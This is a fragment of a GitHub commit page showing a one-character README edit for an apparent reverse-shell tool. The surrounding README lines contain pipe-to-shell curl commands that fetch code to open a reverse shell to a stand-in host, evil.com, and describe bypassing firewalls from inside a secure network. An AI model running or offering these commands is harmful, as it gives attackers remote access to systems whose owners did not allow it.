We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent a37aa9d commit b30700eCopy full SHA for b30700e
README.md
@@ -51,7 +51,7 @@ curl https://reverse-shell.sh/localhost:1337 | sh
51
52
Because this is a reverse connection it can punch through firewalls and connect to the internet.
53
54
-You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with.
+You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:
55
56
```shell
57
curl https://reverse-shell.sh/evil.com:1337 | sh
0 commit comments